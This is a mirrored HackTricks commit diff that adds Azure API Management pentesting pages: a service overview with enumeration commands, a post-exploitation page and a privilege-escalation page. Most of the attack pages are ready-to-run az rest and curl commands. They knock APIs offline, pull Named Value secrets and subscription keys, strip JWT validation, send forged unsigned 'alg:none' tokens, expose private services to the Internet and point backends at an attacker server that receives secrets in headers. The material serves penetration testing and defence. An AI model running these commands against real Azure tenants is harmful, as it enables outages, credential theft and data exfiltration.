gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-26 04:41:55 -08:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #236 from JaimePolop/master

Browse Source 
api management
This commit is contained in:
SirBroccoli
2025-12-23 17:29:18 +01:00
committed by GitHub
parent 1ab248dcad e225449b09
commit a969491e58
4 changed files with 376 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
src/SUMMARY.md
View File

@@ -460,6 +460,7 @@
- [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
- [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
- [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
- [Az - API Management](pentesting-cloud/azure-security/az-services/az-api-management.md)
- [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
- [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
- [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
@@ -507,6 +508,7 @@
- [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md)
- [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md)
- [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
- [Az API Management Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md)
- [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md)
- [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
- [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
@@ -525,6 +527,7 @@
- [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
- [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
- [Az - AI Foundry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md)
- [Az - API Management Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md)
- [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
- [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
- [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)

89
src/pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md Normal file
View File

@@ -0,0 +1,89 @@
# Azure - API Management Post-Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## `Microsoft.ApiManagement/service/apis/policies/write` or `Microsoft.ApiManagement/service/policies/write`
The attacker can use multiple vectors to cause a denial of service. To block legitimate traffic, the attacker adds rate-limiting and quota policies with extremely low values, effectively preventing normal access:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><rate-limit calls=\"1\" renewal-period=\"3600\" /><quota calls=\"10\" renewal-period=\"86400\" /><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
```
To block specific legitimate client IPs, the attacker can add IP filtering policies that reject requests from selected addresses:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><ip-filter action=\"forbid\"><address>1.2.3.4</address><address>1.2.3.5</address></ip-filter><base /></inbound><backend><forward-request /></backend><outbound><base /></outbound></policies>"
}
}'
```
## `Microsoft.ApiManagement/service/backends/write` or `Microsoft.ApiManagement/service/backends/delete`
To cause requests to fail, the attacker can modify a backend configuration and change its URL to an invalid or unreachable address:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://invalid-backend-that-does-not-exist.com",
"protocol": "http"
}
}'
```
Or delete backends:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
## `Microsoft.ApiManagement/service/apis/delete`
To make critical APIs unavailable, the attacker can delete them directly from the API Management service:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
## `Microsoft.ApiManagement/service/write` or `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
To block access from the Internet, the attacker can disable public network access on the API Management service:
```bash
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Disabled"
}
}'
```
## `Microsoft.ApiManagement/service/subscriptions/delete`
To block access for legitimate users, the attacker can delete API Management subscriptions:
```bash
az rest --method DELETE \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<apim-subscription-id>?api-version=2024-05-01" \
--headers "If-Match=*"
```
{{#include ../../../banners/hacktricks-training.md}}

202
src/pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md Normal file
View File

@@ -0,0 +1,202 @@
# Az - API Management Privesc
{{#include ../../../banners/hacktricks-training.md}}
## `Microsoft.ApiManagement/service/namedValues/read` & `Microsoft.ApiManagement/service/namedValues/listValue/action`
The attack consists of accessing sensitive secrets stored in Azure API Management Named Values, either by directly retrieving secret values or by abusing permissions to obtain Key Vaultbacked secrets through managed identities.
```bash
az apim nv show-secret --resource-group <resource-group> --service-name <service-name> --named-value-id <named-value-id>
```
## `Microsoft.ApiManagement/service/subscriptions/read` & `Microsoft.ApiManagement/service/subscriptions/listSecrets/action`
For each subscription, the attacker can obtain the subscription keys by using the listSecrets endpoint with the POST method:
```bash
az rest --method POST \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/subscriptions/<subscription-sid>/listSecrets?api-version=2024-05-01"
```
The response includes the subscription primary key (primaryKey) and secondary key (secondaryKey). With these keys, the attacker can authenticate and access the APIs published through the API Management Gateway:
```bash
curl -H "Ocp-Apim-Subscription-Key: <primary-key-or-secondary-key>" \
https://<service-name>.azure-api.net/<api-path>
```
The attacker can access all APIs and products associated with the subscription. If the subscription has access to sensitive products or APIs, the attacker may obtain confidential information or perform unauthorized operations.
## `Microsoft.ApiManagement/service/policies/write` or `Microsoft.ApiManagement/service/apis/policies/write`
The attacker first retrieves the current API policy:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
```
The attacker can modify the policy in multiple ways depending on their objectives. For example, to disable authentication, if the policy includes JWT token validation, the attacker can remove or comment out that section:
```xml
<policies>
<inbound>
<base />
<!-- JWT validation removed by the attacker -->
<!-- <validate-jwt header-name="Authorization" failed-validation-httpcode="401" >
...
</validate-jwt> -->
</inbound>
<backend>
<base />
</backend>
<outbound>
<base />
</outbound>
<on-error>
<base />
</on-error>
</policies>
```
To remove rate limiting controls and allow denial-of-service attacks, the attacker can remove or comment out quota and rate-limit policies:
```xml
<policies>
<inbound>
<base />
<!-- Rate limiting removed by the attacker -->
<!-- <rate-limit calls="100" renewal-period="60" />
<quota-by-key calls="1000" renewal-period="3600" counter-key="@(context.Subscription.Id)" /> -->
</inbound>
...
</policies>
```
To modify the backend route and redirect traffic to an attacker-controlled server:
```xml
<policies>
...
<inbound>
<base />
<set-backend-service base-url="https://attacker-controlled-server.com" />
</inbound>
...
</policies>
```
The attacker then applies the modified policy. The request body must be a JSON object containing the policy in XML format:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"format": "rawxml",
"value": "<policies><inbound><base /></inbound><backend><base /></backend><outbound><base /></outbound><on-error><base /></on-error></policies>"
}
}'
```
## JWT Validation Misconfiguration
The attacker needs to know that an API uses JWT token validation and that the policy is misconfigured. Poorly configured JWT validation policies may have `require-signed-tokens="false"` or `require-expiration-time="false"`, which allows the service to accept unsigned tokens or tokens that never expire.
The attacker creates a malicious JWT token using the none algorithm (unsigned):
```
# Header: {"alg":"none"}
# Payload: {"sub":"user"}
eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0.
```
The attacker sends a request to the API using the malicious token:
```bash
curl -X GET \
-H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJ1c2VyIn0." \
https://<apim>.azure-api.net/path
```
If the policy is misconfigured with `require-signed-tokens="false"`, the service will accept the unsigned token. The attacker can also create a token without an expiration claim if `require-expiration-time="false"`.
## `Microsoft.ApiManagement/service/applynetworkconfigurationupdates/action`
The attacker first checks the current network configuration of the service:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
```
The attacker reviews the JSON response to verify the values of `publicNetworkAccess` and `virtualNetworkType`. If `publicNetworkAccess` is set to false or `virtualNetworkType` is set to Internal, the service is configured for private access.
To expose the service to the Internet, the attacker must change both settings. If the service is running in internal mode (`virtualNetworkType: "Internal"`), the attacker changes it to None or External and enables public network access. This can be done using the Azure Management API:
```bash
az rest --method PATCH \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"publicNetworkAccess": "Enabled",
"virtualNetworkType": "None"
}
}'
```
Once `virtualNetworkType` is set to `None` or `External` and `publicNetworkAccess` is enabled, the service and all its APIs become accessible from the Internet, even if they were previously protected behind a private network or private endpoints.
## `Microsoft.ApiManagement/service/backends/write`
The attacker first enumerates the existing backends to identify which one to modify:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
```
The attacker retrieves the current configuration of the backend they want to modify:
```bash
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
```
The attacker modifies the backend URL to point to a server under their control. First, they obtain the ETag from the previous response and then update the backend:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"description": "Backend modified by attacker"
}
}'
```
Alternatively, the attacker can configure backend headers to exfiltrate Named Values containing secrets. This is done through the backend credentials configuration:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01" \
--headers "Content-Type=application/json" "If-Match=*" \
--body '{
"properties": {
"url": "https://attacker-controlled-server.com",
"protocol": "http",
"credentials": {
"header": {
"X-Secret-Value": ["{{named-value-secret}}"]
}
}
}
}'
```
With this configuration, Named Values are sent as headers in all requests to the attacker-controlled backend, enabling the exfiltration of sensitive secrets.
{{#include ../../../banners/hacktricks-training.md}}

82
src/pentesting-cloud/azure-security/az-services/az-api-management.md Normal file
View File

@@ -0,0 +1,82 @@
# Az - API Management
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
Azure API Management (APIM) is a fully managed service that offers a **unified platform for publishing, securing, transforming, managing, and monitoring APIs**. It enables organizations to **centralize their API** strategy and ensure consistent governance, performance, and security across all their services. By acting as an abstraction layer between backend services and API consumers, APIM simplifies integration and enhances maintainability while providing essential operational and security capabilities.
## Core Concepts
**The API Gateway** serves as the single entry point for all API traffic, handling functions such as routing requests to backend services, enforcing rate limits, caching responses, and managing authentication and authorization. This gateway is fully hosted and managed by Azure, ensuring high availability and scalability.
**The Developer Portal** provides a self-service environment where API consumers can discover available APIs, read documentation, and test endpoints. It helps streamline onboarding by offering interactive tools and access to subscription information.
**The Management Portal (Management Plane)** is used by administrators to configure and maintain the APIM service. From here, users can define APIs and operations, configure access control, apply policies, manage users, and organize APIs into products. This portal centralizes administration and ensures consistent API governance.
## Authentication and Authorization
Azure API Management supports several **authentication mechanisms** to secure API access. These include **subscription keys**, **OAuth 2.0 tokens**, and **client certificates**. APIM also integrates natively with **Microsoft Entra ID**, enabling **enterprise-level identity management** and **secure access** to both APIs and backend services.
## Policies
Policies in APIM allow administrators to customize **request and response processing** at various granularities, including the **service**, **API**, **operation**, or **product** level. Through policies, it is possible to enforce **JWT token validation**, **transform XML or JSON payloads**, **apply rate limiting**, **restrict calls by IP address**, or **authenticate against backend services using managed identities**. Policies are **highly flexible** and form one of the **core strengths** of the API Management platform, enabling **fine-grained control over runtime behavior** without modifying backend code.
## Named Values
The service provides a mechanism called **Named Values**, which allows storing **configuration information** such as **secrets**, **API keys**, or other values required by policies.
These values can be stored directly within APIM or securely referenced from **Azure Key Vault**. Named Values promote **secure and centralized management** of configuration data and simplify policy authoring by allowing **reusable references** instead of hardcoded values.
## Networking and Security Integration
Azure API Management integrates seamlessly with **virtual network environments**, enabling **private and secure connectivity** to backend systems.
When deployed inside a **Virtual Network (VNet)**, APIM can access **internal services** without exposing them publicly. The service also allows the configuration of **custom certificates** to support **mutual TLS authentication** with backend services, improving security in scenarios where **strong identity validation** is required.
These **networking features** make APIM suitable for both **cloud-native** and **hybrid architectures**.
### Enumerate
To enumerate the API management service:
```bash
# Lists all Named Values configured in the Azure API Management instance
az apim nv list --resource-group <resource-group> --service-name <service-name>
# Retrieves all policies applied at the API level in raw XML format
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/?api-version=2024-05-01&format=rawxml"
# Retrieves the effective policy for a specific API in raw XML format
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/apis/<api-id>/policies/policy?api-version=2024-05-01&format=rawxml"
# Gets the configuration details of the APIM service instance
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<apim>?api-version=2024-05-01"
# Lists all backend services registered in the APIM instance
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends?api-version=2024-05-01"
# Retrieves details of a specific backend service
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>/backends/<backend-id>?api-version=2024-05-01"
# Gets general information about the APIM service
az rest --method GET \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.ApiManagement/service/<service-name>?api-version=2024-05-01"
# Calls an exposed API endpoint through the APIM gateway
curl https://<apim>.azure-api.net/<api-path>
```
{{#include ../../../banners/hacktricks-training.md}}